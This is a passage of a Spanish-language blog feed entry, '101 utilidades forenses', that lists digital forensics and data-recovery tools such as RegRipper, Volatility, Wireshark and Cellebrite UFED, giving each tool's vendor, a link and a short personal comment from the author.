class="Apple-style-span" style="color: #0b5394;"&gt;P2 eXplorer&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Paraben&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Realiza montajes virtuales de unidades y de imágenes. Casi toda la suite, por no decir toda es muy interesante y útil.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 45px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="height: 45px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="height: 45px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;a href="http://www.paraben-enterprise.com/shuttle-free.html" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;P2 Shuttle Free&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;Paraben&lt;/td&gt;&lt;td class="s3"&gt;Suite maravillosa que permite montar remotamente discos, captura de tráfico de red, de RAM, utilidades de búsqueda  etc.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 59px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Paraben Forensics&lt;/span&gt;&lt;/td&gt;&lt;td class="s4"&gt;Paraben&lt;/td&gt;&lt;td class="s5"&gt;Al igual que las anteriores, recoge todos los datos posibles desde el teléfono móvil, a continuación, genera un amplio informe que se puede almacenar o imprimir.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.nirsoft.net/utils/passwordfox.html" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;PasswordFox&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Nirsoft&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Extrae usuario y contraseñas almacenadas en  Mozilla Firefox.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 45px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;a href="http://technet.microsoft.com/en-us/sysinternals/bb896645.aspx" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Process Monitor&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;Microsoft&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Examina los procesos windows y permite hacer un seguimiento en tiempo real del registro y accesos a disco. Excelente y genial herramienta&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;a href="http://www.nucleustechnologies.com/pst-viewer.html" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;PST Viewer&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;Lepide Software&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Abre y visualiza (tampoco exporta) ficheros PST sin necesidad de Outlook.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://technet.microsoft.com/en-us/sysinternals/bb896649.aspx" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;PsTools&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Microsoft&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Maravillosa Suite de utilidades en modo comando. Siempre lo llevo encima.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 17px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="height: 17px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s6"&gt;&lt;br /&gt;&lt;a href="http://www.piriform.com/recuva"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;recuva&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&lt;br /&gt;Piriform&lt;/td&gt;&lt;td class="s7"&gt;&lt;br /&gt;&lt;br /&gt;Has querido recuperar tus ficheros en Windows? Entonces esta es tu utilidad&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 45px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.digitalforensicssolutions.com/registrydecoder/" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Registry Decoder&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Digital Forensics Solutions&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Para la adquisición, análisis e informe del contenido del registro.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 59px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;a href="http://regripper.wordpress.com/program-files/" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;RegRipper&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;Harlan Carvey&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Herramienta de correlación y extracción de evidencias forenses del registro. Todo un lujo del maestro de los maestros forenses. La utilizo día si y día también.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 45px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://sourceforge.net/projects/regshot/files/" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Regshot&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Regshot&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Realiza snapshots del registro con objeto de comparar y ver los cambios que se producen. Ideal para ver que hace un malware.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 59px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s6"&gt;rstudio&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;td class="s5"&gt;&lt;br /&gt;&lt;br /&gt;Es una suite de software de recuperación de datos que puede recuperar archivos de FAT (12-32), NTFS, NTFS 5, + HFS / HFS, FFS, UFS/UFS2 (* BSD, Solaris), ext2/ext3 (Linux&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.shadowexplorer.com/" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Shadow Explorer&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Shadow Explorer&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Visualiza y extrae ficheros de copias  shadow. Lo utilizo en busca de malware. Muy bueno.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 45px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://computer-forensics.sans.org/community/downloads/" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;SIFT&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;SANS&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;VMware Appliance de SANS configurado con multiples herramientas para el análisis forense. Otra tool para llevar encima.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 16px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.nirsoft.net/utils/skype_log_view.html" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;SkypeLogView&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Nirsoft&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Analizador del famoso Skype&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 16px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="height: 16px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s8"&gt;&lt;br /&gt;&lt;a href="http://www.snort.org/"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Snort&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s4"&gt;&lt;br /&gt;Snort&lt;/td&gt;&lt;td class="s4"&gt;&lt;br /&gt;&lt;br /&gt;El mas versatil y magnifico detector de intrusos. Me ha salvado muchas veces del apocalipsis&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 45px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;a href="https://addons.mozilla.org/en-US/firefox/addon/sqlite-manager/" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;SQLite Manager&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Mrinal Kant, Tarakant Tripathy&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;add-on en Firefox que permite ver contenidos de bases de datos SQLite. Otra de las joyas de la corona.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://technet.microsoft.com/en-gb/sysinternals/bb897439.aspx" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Strings&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Microsoft&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;No puedo vivir sin el. Busca contenido de texto en ficheros.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.mitec.cz/ssv.html" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Structred Storage Viewer&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;MiTec&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Visualiza y maneja estructuras basadas en ficheros MS OLE. Lo sigo utilizando.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 17px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s6"&gt;&lt;a href="http://www.getdata.com/"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Suite Getdata&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s7"&gt;getdata&lt;/td&gt;&lt;td class="s7"&gt;&lt;br /&gt;&lt;br /&gt;Magnifica suite de herramientas forenses para el montaje de discos virtuales, imágenes y recuperación y analisis de datos. Excelente conjunto de herramientas&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;br /&gt;Triana Tools&lt;/td&gt;&lt;td class="s4"&gt;&lt;br /&gt;&lt;br /&gt;Informatica64&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Herramienta indispensable para el análisis forense de IPHONE del magnifico Juanito. Si la quieres te la proporcionan si vas a los cursos&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 45px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;a href="http://www.howtogeek.com/howto/15761/recover-data-like-a-forensics-expert-using-an-ubuntu-live-cd/" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Ubuntu guide&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;How-To Geek&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Guia para usar con Unbuntu live con objeto de utilizar recuperación de particiones, ficheros, etc. Tengo mala memoria y suelo acudir alguna vez.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 74px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;a href="http://www.cellebrite.com/"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;UFED&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s4"&gt;Cellebrite&lt;/td&gt;&lt;td class="s5"&gt;&lt;br /&gt;&lt;br /&gt;Es el sistema más completo que combina la extracción lógica y física, la recuperación de clave de acceso y extracción del sistema de archivos de multiples dispositivos móviles. Es caro pero de lo mejor&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 16px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="height: 16px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;a href="http://www.securitybydefault.com/p/herramientas-sbd.html"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Unhide&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s4"&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;Security&lt;/div&gt;&lt;div style="text-align: center;"&gt;By&lt;/div&gt;&lt;div style="text-align: center;"&gt;default&lt;/div&gt;&lt;/td&gt;&lt;td&gt;&lt;br /&gt;&lt;br /&gt;Me encanta, muy útil en tiempos desesperados, mas si se trata de entornos Linux. Si quieres detectar procesos 'raros' este es tu software&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.woanware.co.uk/?p=280" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;USB Device Forensics&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Woanware&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Detalles de las unidades USB que se han conectado a un equipo.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://document-solutions.biz/downloads/?did=9" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;USB Write Blocker&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;DSi&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Habilita la posibilidad de escribir o bloquear puertos USB.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 16px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.nirsoft.net/utils/usb_devices_view.html" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;USBDeview&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Nirsoft&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Igual que la anterior.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 45px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://blog.didierstevens.com/programs/userassist/" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;UserAssist&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Didier Stevens&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Muestra una lista de programas que se han ejecutado incluyendo ultima ejecución , número de veces y fechas y horas. Muy bueno.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 59px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://archive.msdn.microsoft.com/vhdtool" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;VHD Tool&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Microsoft&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Convierte discos e imágenes al formato VHD que se puede montar en Windows desde el administrador de discos. Me ha sacado de algún apuro&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 59px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;a href="http://www.qccis.com/forensic-tools" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;VideoTriage&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;QCC&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Produce miniaturas  de ficheros de video con objeto de apreciar imágenes o movimientos perdidos en la película. Excelente utilidad para mostrar evidencias.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 16px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 59px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="https://www.volatilesystems.com/default/volatility" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Volatility Framework&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Volatile Systems&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Framework que se compone de una colección de herramientas para la extracción de ficheros RAM. Maravillosa herramienta para la detección de Malware. La tengo configurada en SIFT de SANS.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 45px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;a href="http://www.mandiant.com/products/free_software/web_historian/" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Web Historian&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;Mandiant&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Magnifica herramienta que reúne las anteriores y permite de los navegadores mas utilizados obtener el historico de navegación.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 45px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.mitec.cz/wfa.html" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Windows File Analyzer&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;MiTeC&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Otra maravillosa suite para analizar ficheros  thumbs.db, Prefetch, INFO2 y .lnk. Como os podeis imaginar lo empleo muchísimo.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 45px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://winfe.wordpress.com/" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Windows Forensic Environment&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Troy Larson&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Guia de  Brett Shavers para crear y trabajar con un CD que arranque un Windows (Similar a windows PE).&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 15px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s8"&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.wireshark.net/"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Wireshark&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s4"&gt;&lt;br /&gt;&lt;br /&gt;Wireshark&lt;/td&gt;&lt;td class="s4"&gt;&lt;br /&gt;&lt;br /&gt;Algo que decir de esta maravillosa herramienta?. Excepcional!!&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s8"&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.xplico.org/"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Xplico&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s4"&gt;&lt;br /&gt;&lt;br /&gt;xplico&lt;/td&gt;&lt;td class="s5"&gt;&lt;br /&gt;&lt;br /&gt;Entorno gráfico para poder entender y visualizar el contenido de ficheros PCAP. Muy útil!!&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;table border="0" cellpadding="0" cellspacing="0" class="tblGenFixed" id="tblMain"&gt;&lt;tbody&gt;&lt;tr class="rShim"&gt;&lt;td class="rShim" style="width: 0;"&gt;&lt;/td&gt;&lt;td class="rShim" style="width: 116px;"&gt;&lt;/td&gt;&lt;td class="rShim" style="width: 128px;"&gt;&lt;/td&gt;&lt;td class="rShim" style="width: 337px;"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s0"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;OSforensics&lt;/span&gt;&lt;/td&gt;&lt;td class="s1"&gt;Osforensics&lt;/td&gt;&lt;td class="s1"&gt;Una forma rapida de investigar el contenido de ficheros borrados, último&amp;nbsp;acceso. Muy útil si tienes prisa y el equipo no es necesario aportarlo para una evidencia.&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;table border="0" cellpadding="0" cellspacing="0" class="tblGenFixed" id="tblMain"&gt;&lt;tbody&gt;&lt;tr class="rShim"&gt;&lt;td class="rShim" style="width: 0;"&gt;&lt;/td&gt;&lt;td class="rShim" style="width: 116px;"&gt;&lt;/td&gt;&lt;td class="rShim" style="width: 128px;"&gt;&lt;/td&gt;&lt;td class="rShim" style="width: 337px;"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s0"&gt;&lt;a href="http://www.hbgary.com/hbgary-releases-responder-ce"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Responder&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s1"&gt;HBgary&lt;/td&gt;&lt;td class="s1"&gt;&lt;br /&gt;Convierte la memoria RAM a disco y reconstruye todas las estructuras de datos subyacentes de hasta 6 gigabytes de RAM.&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;table border="0" cellpadding="0" cellspacing="0" class="tblGenFixed" id="tblMain"&gt;&lt;tbody&gt;&lt;tr class="rShim"&gt;&lt;td class="rShim" style="width: 0;"&gt;&lt;/td&gt;&lt;td class="rShim" style="width: 116px;"&gt;&lt;/td&gt;&lt;td class="rShim" style="width: 128px;"&gt;&lt;/td&gt;&lt;td class="rShim" style="width: 337px;"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s0"&gt;&lt;a href="http://liveview.sourceforge.net/"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Liveview&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s1"&gt;Liveview&lt;/td&gt;&lt;td class="s1"&gt;&lt;br /&gt;Es una herramienta basada en Java que crea una máquina virtual de VMware de una imagen de disco sin procesar (dd-style) o un disco físico. Muy buena!!&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583475030409211074-1848810268477396452?l=conexioninversa.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/1848810268477396452/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=1848810268477396452' title='8 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/1848810268477396452'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/1848810268477396452'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2011/11/101-utilidades-forenses.html' title='101 utilidades forenses'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-i7_EwfZlEsc/TsZcUSl7UHI/AAAAAAAACgw/zjxG_4eU7To/s72-c/caja-de-herramientas_17-117063456.jpg' height='72' 